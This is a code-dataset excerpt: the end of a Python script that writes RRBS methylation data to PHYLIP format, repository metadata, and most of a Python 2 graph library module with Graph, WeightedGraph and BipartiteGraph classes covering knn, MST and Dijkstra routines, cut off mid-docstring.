"RRBS_NormalBCD19pcell67_88_TCCTGAGC.TAGCGG",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.TATCTC",
"RRBS_NormalBCD19pcell67_88_TCCTGAGC.TCTCTG"]
print(total_matrix.shape)
# code missing values as "?", the PHYLIP convention for an unknown state
total_matrix = total_matrix.applymap(lambda x: int(x) if pd.notnull(x) else "?")
total_matrix = total_matrix.astype(str).apply(''.join)
tott = pd.Series(total_matrix.index.astype(str).str.cat(total_matrix.astype(str),' '))
tott.to_csv("normal_chrom14.phy", header=None, index=None)
print(tott.shape)
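# --- illustrative sketch (editor's addition, not part of the original script) ---
# A self-contained toy version of the PHYLIP-building pipeline above, to make
# the applymap / join / cat steps explicit. All names here are hypothetical.
if __name__ == "__main__":
    toy = pd.DataFrame({"cellA": [1, 0, None], "cellB": [0, None, 1]})
    # missing calls become "?", the PHYLIP character for an unknown state
    toy = toy.applymap(lambda x: int(x) if pd.notnull(x) else "?")
    # join down each column: one methylation string per cell, e.g. "10?"
    joined = toy.astype(str).apply("".join)
    # one PHYLIP line per cell, "<name> <states>", as str.cat produces above
    for name, states in joined.items():
        print(name + " " + states)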
|
evanbiederstedt/RRBSfun
|
trees/chrom_scripts/normal_chr14.py
|
Python
|
mit
| 25,844
|
[
"MCell"
] |
8c87a0fdbacb7487201d271d86bab066d4dd598756fc785bb7b0bf8c74bf2ac6
|
from _graph import *
from _graph import __doc__
import numpy as np
"""
This module implements the main graph classes of fff2
Graph: basic topological graph, i.e. vertices and edges. Not well developed
WeightedGraph (Graph): Idem plus values associated with vertices
BipartiteGraph (WeightedGraph): Idem but the graph is Bipartite
Author: Bertrand Thirion, 2006--2009
Fixme : add graph creation routines that are more practical
than current procedures
"""
class Graph:
"""
This is the basic topological (non-weighted) directed Graph class
fields :
- V(int) = the number of vertices
- E(int) = the number of edges
- edges = array of int with shape (E,2) : the edges of the graph
"""
def __init__(self, V, E=0):
self.V = int(V)
if self.V < 1:
raise ValueError, 'Empty graphs cannot be created'
self.E = int(E)
if self.E<0:
self.E = 0
self.vertices = [a for a in range(self.V)]
self.edges = np.zeros((self.E,2),np.int)
def set_edges(self,edges):
"""
sets self.edges=edges if
1. edges has a correct size
2. edges take values in [0..V-1]
"""
if np.shape(edges)!=np.shape(self.edges):
raise ValueError, 'Incompatible size of the edge matrix'
if np.size(edges)>0:
if edges.max()+1>self.V:
raise ValueError, 'Incorrect edge specification'
self.edges = edges
def get_vertices(self):
return self.vertices
def get_edges(self):
try:
temp = self.edges
except:
temp = []
return temp
def get_V(self):
return self.V
def get_E(self):
return self.E
def adjacency(self):
A = np.zeros((self.V,self.V))
for e in range(self.E):
i = self.edges[e][0]
j = self.edges[e][1]
A[i,j] = 1
return(A)
def complete(self):
self.E = self.V*self.V
x = np.array(np.where(np.ones((self.V,self.V))))
self.edges = np.transpose(x)
def cc(self):
"""
Returns an array of labels corresponding to the different
connected components of the graph.
Returns
-------
label: array of shape(self.V), labelling of the vertices
"""
if self.E>0:
label = graph_cc(self.edges[:,0],self.edges[:,1],
np.zeros(self.E),self.V)
else:
label = np.arange(self.V)
return label
def degrees(self):
"""
returns the degree of the graph vertices
Returns
-------
rdegree: array of shape self.V, the right degree
ldegree: array of shape self.V, the left degree
"""
if self.E>0:
right,left = graph_degrees(self.edges[:,0],self.edges[:,1],self.V)
else:
right = np.zeros(self.V,np.int)
left = np.zeros(self.V,np.int)
return right,left
def main_cc(self):
"""
Returns the indexes of the vertices within the main cc
Returns
-------
idx: array of shape (sizeof main cc)
"""
if self.E>0:
idx = graph_main_cc(self.edges[:,0], self.edges[:,1],
np.zeros(self.E),self.V)
else:
idx = 0
return idx
def show(self,figid=-1):
"""
show the graph as a planar graph
Parameters
----------
figid = -1 the figure id in pylab
by default a new figure is created
Returns
-------
figid
"""
import matplotlib.pylab as mp
if figid>-1:
figid = mp.figure(int(figid))
else:
mp.figure()
t = (2*np.pi*np.arange(self.V))/self.V
mp.plot(np.cos(t),np.sin(t),'.')
for e in range(self.E):
A = (self.edges[e,0]*2*np.pi)/self.V
B = (self.edges[e,1]*2*np.pi)/self.V
mp.plot([np.cos(A),np.cos(B)],[np.sin(A),np.sin(B)],'k')
mp.axis('off')
return figid
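# --- illustrative sketch (editor's addition) ---------------------------------
# Minimal usage of the Graph bookkeeping above; only pure-Python methods are
# exercised, so the compiled _graph helpers are not required here.
def _demo_basic_graph():
    g = Graph(3, 2)
    g.set_edges(np.array([[0, 1], [1, 2]]))
    # adjacency() builds the dense V x V matrix: A[0,1] = A[1,2] = 1
    return g.adjacency()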
class WeightedGraph(Graph):
"""
This is the basic weighted, directed graph class implemented in fff
fields :
V(int) = the number of vertices
E(int) = the number of edges
edges = array of int with shape (E,2):
the edges of the graph
weights = array of float with shape (E):
the weights/lengths of the graph edges
"""
def __init__(self, V, edges=None, weights=None):
"""
Parameters
----------
V (int >0): the number of vertices of the graph
edges=None: array of shape(E,2)
the edge array of the graph
weights=None: array of shape (E)
the associated weights array
"""
V = int(V)
if V<1:
raise ValueError, 'cannot create graph with no vertex'
self.V = int(V)
self.E = 0
if (edges is None) and (weights is None):
edges = []
weights = []
else:
if edges.shape[0]==np.size(weights):
E = edges.shape[0]
Graph.__init__(self, V, E)
Graph.set_edges(self,edges)
self.weights = weights
else:
raise ValueError, 'Incompatible size of the edges\
and weights matrices'
def adjacency(self):
"""
Create the adjacency matrix of self
Returns
-------
A : array of shape (self.V, self.V), dtype np.double
adjacency matrix of the graph
Caveat
------
may break if self.V is large
Future version should allow sparse matrix coding
"""
A = np.zeros((self.V,self.V),np.double)
for e in range(self.E):
i = self.edges[e][0]
j = self.edges[e][1]
A[i,j] = self.weights[e]
return(A)
def from_adjacency(self,A):
"""
sets the edges of self according to the adjacency matrix A
Parameters
----------
A: array of shape (self.V, self.V)
"""
if A.shape[0] != self.V:
raise ValueError,"bad size for A"
if A.shape[1] != self.V:
raise ValueError,"bad size for A"
i,j = np.where(A)
self.edges = np.transpose(np.vstack((i,j)))
self.weights = (A[i,j])
self.E = np.size(i)
def set_weights(self,weights):
"""
Parameters
----------
weights : an array of shape (self.E), edge weights
"""
if np.size(weights)!=self.E:
raise ValueError, 'The weight size is not the edges size'
else:
self.weights = np.reshape(weights,(self.E))
def get_weights(self):
return self.weights
def from_3d_grid(self,xyz,k=18):
"""
set the graph to be the topological neighbours graph
of the three-dimensional coordinate set xyz,
in the k-connectivity scheme
Parameters
----------
xyz: array of shape (self.V,3) and type np.int,
k = 18: the number of neighbours considered. (6,18 or 26)
Returns
-------
E(int): the number of edges of self
"""
if xyz.shape[0]!=self.V:
raise ValueError, 'xyz should have shape n*3, with n =self.V'
if xyz.shape[1]!=3:
raise ValueError, 'xyz should have shape n*3'
graph = graph_3d_grid(xyz, k)
if graph is not None:
i,j,d = graph
else:
raise TypeError, 'Creating graph from grid failed. '\
'Maybe the grid is too big'
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.E
def complete(self):
"""
self.complete()
makes self a complete graph (i.e. each pair of vertices is an edge)
"""
i,j,d = graph_complete(self.V)
self.E = self.V*self.V
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
def eps(self,X,eps=1.):
"""
set the graph to be the eps-nearest-neighbours graph of the data
Parameters
----------
X array of shape (self.V) or (self.V,p)
where p = dimension of the features
data used for eps-neighbours computation
eps=1. (float), the neighborhood width
Returns
-------
self.E the number of edges of the resulting graph
Note
----
It is assumed that the features are embedded in a
(locally) Euclidean space
trivial edges (aa) are included
for the sake of speed it is advisable to give
a PCA-preprocessed matrix X
"""
if np.size(X)==X.shape[0]:
X = np.reshape(X,(np.size(X),1))
if X.shape[0]!=self.V:
raise ValueError, 'X.shape[0]!=self.V'
try:
eps = float(eps)
except:
"eps cannot be cast to a float"
if np.isnan(eps):
raise ValueError, 'eps is nan'
if np.isinf(eps):
raise ValueError, 'eps is inf'
i,j,d = graph_eps(X,eps)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
def knn(self,X,k=1):
"""
E = knn(X,k)
set the graph to be the k-nearest-neighbours graph of the data
Parameters
----------
X array of shape (self.V) or (self.V,p)
where p = dimension of the features
data used for eps-neighbours computation
k=1 : is the number of neighbours considered
Returns
-------
- self.E (int): the number of edges of the resulting graph
Note
----
It is assumed that the features are embedded in a
(locally) Euclidean space
the knn system is symmeterized: if (ab) is one of the edges
then (ba) is also included
trivial edges (aa) are not included
for the sake of speed it is advisable to give
a PCA-preprocessed matrix X.
"""
if np.size(X)==X.shape[0]:
X = np.reshape(X,(np.size(X),1))
if X.shape[0]!=self.V:
raise ValueError, 'X.shape[0] != self.V'
try:
k=int(k)
except :
"k cannot be cast to an int"
if np.isnan(k):
raise ValueError, 'k is nan'
if np.isinf(k):
raise ValueError, 'k is inf'
i,j,d = graph_knn(X,k)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.E
def mst(self,X):
"""
makes self the MST of the array X
Parameters
----------
X: an array of shape (self.V,dim)
dim is the feature dimension of X
Returns
-------
tl (float) the total length of the mst
Note
----
It is assumed that the features are embedded in a
(locally) Euclidean space
The edge system is symmeterized: if (ab) is one of the edges
then (ba) is another edge
As a consequence, the graph comprises (2*self.V-2) edges
the algorithm uses Boruvka's method
"""
if np.size(X)==X.shape[0]:
X = np.reshape(X,(np.size(X),1))
if X.shape[0]!=self.V:
raise ValueError, 'X.shape[0] != self.V'
i,j,d = graph_mst(X)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.weights.sum()/2
def cut_redundancies(self):
"""
self.cut_redundancies()
Remove possibly redundant edges: if an edge (ab) is present twice
in the edge matrix, only the first instance is kept.
The weights are processed accordingly
Returns
-------
- E(int): the number of edges, self.E
"""
if self.E>0:
i,j,d = graph_cut_redundancies( self.edges[:,0], self.edges[:,1],
self.weights, self.V)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.E
def dijkstra(self,seed=0):
"""
returns all the [graph] geodesic distances starting from seed
it is mandatory that the graph weights are non-negative
Parameters
----------
seed (int, >-1,<self.V) or array of shape(p)
vertices from which the distances are computed
Returns
-------
dg: array of shape (self.V) ,
the graph distance dg from any vertex to the nearest seed
Note
----
it is mandatory that the graph weights are non-negative
"""
try:
if self.weights.min()<0:
raise ValueError, 'some weights are negative'
except:
raise ValueError,'undefined weights'
if self.E>0:
if np.size(seed)>1:
dg = graph_dijkstra_multiseed( self.edges[:,0],
self.edges[:,1],self.weights,seed,self.V)
else:
dg = graph_dijkstra(self.edges[:,0],
self.edges[:,1],self.weights,seed,self.V)
else:
dg = np.infty*np.ones((self.V,np.size(seed)))
for i in range(np.size(seed)):
dg[seed[i],i] = 0
return dg
def floyd(self, seed=None):
"""
Compute all the geodesic distances starting from seeds
it is mandatory that the graph weights are non-negative
Parameters
----------
seed= None: array of shape (nbseed), type np.int
vertex indexes from which the distances are computed
if seed==None, then every vertex is a seed point
Returns
-------
dg array of shape (nbseed,self.V)
the graph distance dg from each seed to any vertex
Note
----
It is mandatory that the graph weights are non-negative
The algorithm proceeds by repeating Dijkstra's algorithm for each
seed. Floyd's algorithm is not used (O(self.V^3) complexity...)
By convention, infinite distances are coded as sum(self.weights)+1
"""
if seed is None:
seed = np.arange(self.V)
if self.E==0:
dg = np.infty*np.ones((self.V,np.size(seed)))
for i in range(np.size(seed)): dg[seed[i],i] = 0
return dg
try:
if self.weights.min()<0:
raise ValueError, 'some weights are negative'
except:
raise ValueError,'undefined weights'
dg = graph_floyd(self.edges[:,0], self.edges[:,1], self.weights,
seed, self.V)
return dg
def normalize(self,c=0):
"""
Normalize the graph according to the index c
Normalization means that the sum of the edges values
that go into or out of each vertex must sum to 1
Parameters
----------
c=0 in {0,1,2}, optional: index that designates the way
according to which D is normalized
c == 0 => for each vertex a, sum{edge[e,0]=a} D[e]=1
c == 1 => for each vertex b, sum{edge[e,1]=b} D[e]=1
c == 2 => symmetric ('l2') normalization
Note
----
Note that when sum{e, edge[e,c]=a} D[e] = 0 for a vertex a, nothing is performed
"""
c = int(c)
if c>2:
raise ValueError, 'c>2'
if c<0:
raise ValueError, 'c<0'
if self.E==0:
if c<2:
return np.zeros(self.V)
else:
return np.zeros(self.V),np.zeros(self.V)
if c<2:
i,j,d,s = graph_normalize(self.edges[:,0], self.edges[:,1],
self.weights,c,self.V)
else:
i,j,d,s,t = graph_normalize(self.edges[:,0], self.edges[:,1],
self.weights,c,self.V)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = d
if c<2:
return s
else:
return s,t
def reorder(self,c=0):
"""
Reorder the graph according to the index c
Parameters
----------
c=0 in {0,1,2}, index that designates the array
according to which the vectors are jointly reordered
c == 0 => reordering makes edges[:,0] increasing,
and edges[:,1] increasing for edges[:,0] fixed
c == 1 => reordering makes edges[:,1] increasing,
and edges[:,0] increasing for edges[:,1] fixed
c == 2 => reordering makes weights increasing
"""
c = int(c)
if c>2:
raise ValueError, 'c>2'
if c<0:
raise ValueError, 'c<0'
if self.E>0:
i,j,d = graph_reorder(self.edges[:,0],self.edges[:,1],
self.weights,c,self.V)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = d
def set_euclidian(self, X):
"""
Compute the weights of the graph as the distances between the
corresponding rows of X, which represents an embedding of self
Parameters
----------
X array of shape (self.V, edim),
the coordinate matrix of the embedding
"""
if np.size(X)==X.shape[0]:
X = np.reshape(X,(np.size(X),1))
if X.shape[0]!=self.V:
raise ValueError, 'X.shape[0] != self.V'
if self.E>0:
d = graph_set_euclidian(self.edges[:,0],self.edges[:,1],X)
self.weights = d
def set_gaussian(self, X, sigma=0):
"""
Compute the weights of the graph as a gaussian function
of the distance between the
corresponding rows of X, which represents an embedding of self
Parameters
----------
X array of shape (self.V,dim)
the coordinate matrix of the embedding
sigma=0, float : the parameter of the gaussian function
Note
----
when sigma = 0, the following value is used :
sigma = sqrt(mean(||X[self.edges[:,0],:]-X[self.edges[:,1],:]||^2))
"""
sigma = float(sigma)
if sigma<0:
raise ValueError, 'sigma<0'
if np.size(X)==X.shape[0]:
X = np.reshape(X,(np.size(X),1))
if X.shape[0]!=self.V:
raise ValueError, 'X.shape[0] != self.V'
if self.E>0:
d = graph_set_gaussian(self.edges[:,0],self.edges[:,1],X,sigma)
self.weights = d
def symmeterize(self):
"""
symmeterize the graph self, i.e. produces the graph
whose adjacency matrix would be the symmetric part of
its current adjacency matrix
"""
if self.E>0:
i,j,d = graph_symmeterize(self.edges[:,0],self.edges[:,1],self.weights,self.V)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = d
return self.E
def anti_symmeterize(self):
"""
self.anti_symmeterize()
anti-symmeterize self, i.e. produces the graph
whose adjacency matrix would be the antisymmetric part of
its current adjacency matrix
"""
if self.E>0:
i,j,d = graph_antisymmeterize(self.edges[:,0],self.edges[:,1],
self.weights,self.V)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = d
return self.E
def to_neighb(self):
"""
converts the graph to a neighboring system
The neighboring system is nothing but a (sparser)
representation of the edge matrix
Returns
-------
ci, ne, we: arrays of shape (self.V+1), (self.E), (self.E)
such that self.edges, self.weights
is coded such that:
for j in [ci[a], ci[a+1][, there exists an edge e so that
(edge[e,0]=a,edge[e,1]=ne[j],self.weights[e] = we[j])
"""
if self.E>0:
ci,ne,we = graph_to_neighb(self.edges[:,0],self.edges[:,1],
self.weights,self.V)
else:
ci = []
ne = []
we = []
return ci,ne,we
def Voronoi_Labelling(self,seed):
"""
label = self.Voronoi_Labelling(seed)
performs a voronoi labelling of the graph
Parameters
----------
seed array of shape (nseeds), type (np.int),
vertices from which the cells are built
Returns
-------
- labels : array of shape (self.V) the labelling of the vertices
fixme: how is the case of a disconnected graph handled?
"""
if np.size(seed)==0:
raise ValueError, 'empty seed'
if seed.max()>self.V-1:
raise ValueError, 'seed.max()>self.V-1'
labels = -np.ones(self.V,np.int)
labels[seed] = np.arange(np.size(seed))
if self.E>0:
labels = graph_voronoi(self.edges[:,0], self.edges[:,1],
self.weights, seed,self.V)
return labels
def cliques(self):
"""
Extraction of the graph cliques
these are defined using replicator dynamics equations
Returns
-------
- cliques: array of shape (self.V), type (np.int)
labelling of the vertices according to the clique they belong to
"""
cliques = np.arange(self.V)
if self.E>0:
cliques = graph_rd(self.edges[:,0], self.edges[:,1],
self.weights, self.V)
return cliques
def remove_trivial_edges(self):
"""
Removes trivial edges, i.e. edges that are (vv)-like
self.weights and self.E are corrected accordingly
Returns
-------
- self.E (int): The number of edges
"""
i = np.nonzero(self.edges[:,0]!=self.edges[:,1])[0]
self.edges = self.edges[i,:]
self.weights = self.weights[i]
self.E = np.size(i)
return self.E
def subgraph(self,valid):
"""
Creates a subgraph with the vertices for which valid>0
and with the corresponding set of edges
Parameters
----------
valid array of shape (self.V): nonzero for vertices to be retained
Returns
-------
G WeightedGraph instance, the desired subgraph of self
Note
----
The vertices are renumbered as [0..p-1] where p = sum(valid>0)
when sum(valid>0)==0 then None is returned
"""
if np.size(valid)!= self.V:
raise ValueError, "incompatible size for self anf valid"
if np.sum(valid>0)==0:
return None
if self.E>0:
win_edges = (valid[self.edges]).min(1)>0
edges = self.edges[win_edges,:]
weights = self.weights[win_edges]
renumb = np.hstack((0,np.cumsum(valid>0)))
edges = renumb[edges]
G = WeightedGraph(np.sum(valid>0),edges,weights)
else:
G = WeightedGraph(np.sum(valid>0))
return G
def Kruskal(self):
"""
Creates the Minimum Spanning Tree self using Kruskal's algo.
efficient if self is sparse
Returns
-------
K: WeightedGraph instance
the resulting MST
Note
----
if self contains several connected components,
self.Kruskal() will also retain a graph with k connected components
"""
k = self.cc().max()+1
E = 2*self.V-2
V = self.V
Kedges = np.zeros((E,2)).astype(np.int)
Kweights = np.zeros(E)
iw = np.argsort(self.weights)
label = np.arange(V) #(2*V-1)
j = 0
for i in range(V-k):
a = self.edges[iw[j],0]
b = self.edges[iw[j],1]
d = self.weights[iw[j]]
while label[a]==label[b]:
j = j+1
a = self.edges[iw[j],0]
b = self.edges[iw[j],1]
d = self.weights[iw[j]]
if label[a]!=label[b]:
la = label[a]
lb = label[b]
label[label==lb] = la
Kedges[2*i,0] = a
Kedges[2*i,1] = b
Kedges[2*i+1,0] = b
Kedges[2*i+1,1] = a
Kweights[2*i] = d
Kweights[2*i+1] = d
K = WeightedGraph(V,Kedges,Kweights)
return K
def Kruskal_dev(self):
"""
Creates the Minimum Spanning Tree self using Kruskal's algo.
efficient if self is sparse
Returns
-------
K: WeightedGraph instance
the resulting MST
Note
----
if self contains several connected components,
self.Kruskal() will also retain a graph with k connected components
"""
k = self.cc().max()+1
E = 2*self.V-2
V = self.V
Kedges = np.zeros((E,2)).astype(np.int)
Kweights = np.zeros(E)
iw = np.argsort(self.weights)
label = np.arange(2*V-1)
j = 0
for i in range(V-k):
a = self.edges[iw[j],0]
b = self.edges[iw[j],1]
d = self.weights[iw[j]]
la = label[a]
lb = label[b]
while la != label[la]: la = label[la]
while lb != label[lb]: lb = label[lb]
while la==lb:
j = j+1
a = self.edges[iw[j],0]
b = self.edges[iw[j],1]
d = self.weights[iw[j]]
la = label[a]
lb = label[b]
while la != label[la]: la = label[la]
while lb != label[lb]: lb = label[lb]
if la!=lb:
label[la] = V+i
label[lb] = V+i
Kedges[2*i,0] = a
Kedges[2*i,1] = b
Kedges[2*i+1,0] = b
Kedges[2*i+1,1] = a
Kweights[2*i] = d
Kweights[2*i+1] = d
K = WeightedGraph(V,Kedges,Kweights)
return K
def Voronoi_diagram(self,seeds,samples):
"""
Defines the graph as the Voronoi diagram (VD)
that links the seeds.
The VD is defined using the sample points.
Parameters
----------
seeds: array of shape (self.V,dim)
samples: array of shape (nsamples,dim)
Note
----
by default, the weights are a Gaussian function of the distance
The implementation is not optimal
"""
# checks
if seeds.shape[0]!=self.V:
raise ValueError,"The numberof seeds is not as expected"
if np.size(seeds) == self.V:
seeds = np.reshape(seeds,(np.size(seeds),1))
if np.size(samples) == samples.shape[0]:
samples = np.reshape(samples,(np.size(samples),1))
if seeds.shape[1]!=samples.shape[1]:
raise ValueError,"The seeds and samples do not belong \
to the same space"
#1. define the graph knn(samples,seeds,2)
i,j,d = graph_cross_knn(samples,seeds,2)
#2. put all the pairs in the target graph
Ns = np.shape(samples)[0]
self.E = Ns
self.edges = np.array([j[2*np.arange(Ns)],j[2*np.arange(Ns)+1]]).T
self.weights = np.ones(self.E)
#3. eliminate the redundancies and set the weights
self.cut_redundancies()
self.symmeterize()
self.set_gaussian(seeds)
def show(self,X=None,figid=-1):
"""
a = self.show(X=None)
plots the current graph in 2D
Parameters
----------
X=None, array of shape (self.V,2)
a set of coordinates that can be used
to embed the vertices in 2D.
if X.shape[1]>2, a svd reduces X for display
By default, the graph is presented on a circle
figid=-1: a figure id for pylab plotting
by default, a new figure is created
Returns
-------
a = figure handle
Note
----
This should be used only for small graphs...
"""
if np.size(self.weights)==0:
fig = Graph.show(self)
return fig
WM = self.weights.max()
import matplotlib.pylab as mp
if figid >-1:
fig = mp.figure(figid)
else:
fig = mp.figure()
ml = 5.
if X is None:
for e in range(self.E):
A = (self.edges[e,0]*2*np.pi)/self.V
B = (self.edges[e,1]*2*np.pi)/self.V
C = max(1,int(self.weights[e]*ml/WM))
mp.plot([np.cos(A),np.cos(B)],[np.sin(A),np.sin(B)],'k',
linewidth=C)
t = (2*np.pi*np.arange(self.V))/self.V
mp.plot(np.cos(t),np.sin(t),'o',linewidth=ml)
mp.axis([-1.1,1.1,-1.1,1.1])
return fig
if (X.shape[0]!=self.V):
raise ValueError,'X.shape(0)!=self.V'
if np.size(X)==self.V:
X = np.reshape(X,(self.V,1))
if X.shape[1]==1:
# plot the graph on a circle
x = np.pi*(X-X.min())/(X.max()-X.min())
for e in range(self.E):
A = x[self.edges[e,0]]
B = x[self.edges[e,1]]
C = max(1,int(self.weights[e]*ml/WM))
mp.plot([np.cos(A),np.cos(B)],[np.sin(A),np.sin(B)],
'k',linewidth=C)
mp.plot(np.cos(x),np.sin(x),'o',linewidth=ml)
mp.axis([-1.1,1.1,-0.1,1.1])
if X.shape[1]>2:
Y = X.copy()
import numpy.linalg as L
M1,M2,M3 = L.svd(Y,0)
Y = np.dot(M1,np.diag(M2))
Y = Y[:,:2]
if X.shape[1]<3:
Y = X
if Y.shape[1]==2:
for e in range(self.E):
A = self.edges[e,0]
B = self.edges[e,1]
C = max(1,int(self.weights[e]*ml/WM))
mp.plot([Y[A,0],Y[B,0]],[Y[A,1],Y[B,1]],'k',linewidth=C)
mp.plot(Y[:,0],Y[:,1],'o',linewidth=ml)
xmin = Y[:,0].min()
ymin = Y[:,1].min()
xmax = Y[:,0].max()
ymax = Y[:,1].max()
xmin = 1.1*xmin-0.1*xmax
xmax = 1.1*xmax-0.1*xmin
ymin = 1.1*ymin-0.1*ymax
ymax = 1.1*ymax-0.1*ymin
mp.axis([xmin,xmax,ymin,ymax])
mp.show()
return fig
def converse_edge(self):
"""
Returns the index of the edge (j,i) for each edge (i,j)
Note: a C implementation might be necessary
"""
ci,ne,we = self.to_neighb()
li = self.left_incidence()
ri = self.right_incidence()
tag = -np.ones(self.E,np.int)
for v in range(self.V):
# e = (vw)
for e in li[v]:
w = self.edges[e,1]
# c=(wv)
liw = np.array(li[w])
c = liw[self.edges[li[w],1]==v]
tag[e]=c
return tag
def remove_edges(self,valid):
"""
Removes all the edges for which valid==0
Parameters
----------
valid, an array of shape (self.E)
"""
if np.size(valid)!=self.E:
raise ValueError, "the input vector does not have the correct size"
valid = np.reshape(valid,np.size(valid))
self.E = int(valid.sum())
self.edges = self.edges[valid!=0,:]
self.weights = self.weights[valid!=0]
def list_of_neighbors(self):
"""
returns the set of neighbors of self as a list of arrays
"""
ci,ne,we = self.to_neighb()
ln = [ne[ci[i]:ci[i+1]] for i in range(self.V)]
return ln
def copy(self):
"""
returns a copy of self
"""
G = WeightedGraph(self.V,self.edges.copy(),self.weights.copy())
return G
def skeleton(self):
"""
returns an MST based on self.weights
Note: self must be connected
"""
# check that self is connected
u = self.cc()
if u.max()>0:
raise ValueError, "cannot create the skeleton for \
unconnected graphs"
i,j,d = graph_skeleton(self.edges[:,0],self.edges[:,1],
self.weights,self.V)
E = np.size(i)
edges = np.zeros((E,2),np.int)
edges[:,0] = i
edges[:,1] = j
weights = np.array(d)
G = WeightedGraph(self.V,edges,weights)
return G
def left_incidence(self):
"""
Returns
-------
the left incidence matrix of self
as a list of lists:
i.e. the list[[e.0.0,..,e.0.i(0)],..,[e.V.0,E.V.i(V)]]
where e.i.j is the set of edge indexes so that
e.i.j[0] = i
"""
linc = []
for i in range(self.V):
linc.append([])
for e in range(self.E):
i = self.edges[e,0]
a = linc[i]
a.append(e)
return linc
def right_incidence(self):
"""
Returns
-------
the right incidence matrix of self
as a list of lists:
i.e. the list[[e.0.0,..,e.0.i(0)],..,[e.V.0,E.V.i(V)]]
where e.i.j is the set of edge indexes so that
e.i.j[1] = i
"""
rinc = []
for i in range(self.V):
rinc.append([])
for e in range(self.E):
i = self.edges[e,1]
a = rinc[i]
a.append(e)
return rinc
def is_connected(self):
"""
States whether self is connected or not
"""
if self.V<1:
raise ValueError, "empty graph"
if self.V<2:
return True
if self.E==0:
return False
b = graph_is_connected(self.edges[:,0],self.edges[:,1],
self.weights,self.V)
if b==-1:
raise ValueError, "problem in the c function"
return int(b)
def WeightedDegree(self,c):
"""
returns the weighted degrees of the vertices of self
Parameters
----------
c (int): side selection
if c==0 considering left side
if c==1 considering right side of the edges
Returns
-------
wd : array of shape (self.V),
the resulting weighted degree
Note: slow implementation
"""
if c==0:
mlist = self.left_incidence()
else:
mlist = self.right_incidence()
w = self.get_weights()
wd = [np.sum(w[n]) for n in mlist]
wd = np.array(wd)
return wd
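# --- illustrative sketch (editor's addition) ---------------------------------
# A pure-Python reference for the geodesic-distance semantics of
# WeightedGraph.dijkstra, using heapq instead of the compiled graph_dijkstra.
# It assumes non-negative weights, as the method's docstring requires.
def _dijkstra_reference(edges, weights, seed, V):
    import heapq
    succ = [[] for _ in range(V)]            # vertex -> [(neighbour, weight)]
    for (a, b), w in zip(edges, weights):
        succ[a].append((b, w))
    dist = [np.inf] * V
    dist[seed] = 0.0
    heap = [(0.0, seed)]
    while heap:
        d, v = heapq.heappop(heap)
        if d > dist[v]:
            continue                          # stale heap entry
        for nbr, w in succ[v]:
            if d + w < dist[nbr]:
                dist[nbr] = d + w
                heapq.heappush(heap, (d + w, nbr))
    return np.array(dist)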
class BipartiteGraph(WeightedGraph):
"""
This is a bipartite graph structure, i.e.
a graph in which there are two types of nodes, such that
edges can exist only between nodes of type 1 and type 2
(not within)
fields of this class:
V (int,>0) the number of type 1 vertices
W (int,>0) the number of type 2 vertices
E : (int) the number of edges
edges: array of shape (self.E,2) representing pairwise neighbors
weights, array of shape (self.E), +1/-1 for ascending/descending links
"""
def __init__(self, V,W, edges=None, weights=None):
"""
Parameters
----------
V (int), the number of vertices of subset 1
W (int), the number of vertices of subset 2
edges=None: array of shape (self.E,2)
the edge array of the graph
weights=None: array of shape (self.E)
the associated weights array
"""
V = int(V)
W = int(W)
if (V<1) or (W<1):
raise ValueError, 'cannot create graph with no vertex'
self.V = V
self.W = W
self.E = 0
if (edges is None) and (weights is None):
self.edges = np.array([],np.int)
self.weights = np.array([])
else:
if edges.shape[0]==np.size(weights):
E = edges.shape[0]
self.E = E
self.edges = -np.ones((E,2),np.int)
self.set_edges(edges)
#print np.shape(weights),self.E
WeightedGraph.set_weights(self,weights)
else:
raise ValueError, 'Incompatible size of the edges and \
weights matrices'
def set_edges(self,edges):
"""
sets self.edges=edges if
1. edges has a correct size
2. edges take values in [0..V-1]*[0..W-1]
Parameters
----------
edges: array of shape(self.E,2): set of candidate edges
"""
if np.shape(edges)!=np.shape(self.edges):
raise ValueError, 'Incompatible size of the edge matrix'
if np.size(edges)>0:
if edges.max(0)[0]+1>self.V:
raise ValueError, 'Incorrect edge specification'
if edges.max(0)[1]+1>self.W:
raise ValueError, 'Incorrect edge specification'
self.edges = edges
def check_feature_matrices(self,X,Y):
"""
checks whether the dimensions of X and Y are coherent with self
and possibly reshapes them
Parameters
----------
X,Y arrays of shape (self.V) or (self.V,p)
and (self.W) or (self.W,p) respectively
where p = common dimension of the features
"""
if np.size(X)==X.shape[0]:
X = np.reshape(X,(np.size(X),1))
if np.size(Y)==Y.shape[0]:
Y = np.reshape(Y,(np.size(Y),1))
if X.shape[1]!=Y.shape[1]:
raise ValueError, 'X.shape[1] should = Y.shape[1]'
if X.shape[0]!=self.V:
raise ValueError, 'X.shape[0]!=self.V'
if Y.shape[0]!=self.W:
raise ValueError, 'Y.shape[0]!=self.W'
def copy(self):
"""
returns a copy of self
"""
G = BipartiteGraph(self.V,self.W,self.edges.copy(),
self.weights.copy())
return G
def cross_eps(self,X,Y,eps=1.):
"""
set the graph to be the eps-neighbours graph from X to Y
Parameters
----------
X,Y arrays of shape (self.V) or (self.V,p)
and (self.W) or (self.W,p) respectively
where p = common dimension of the features
eps=1, float : the neighbourhood size considered
Returns
-------
self.E (int) the number of edges of the resulting graph
Note
----
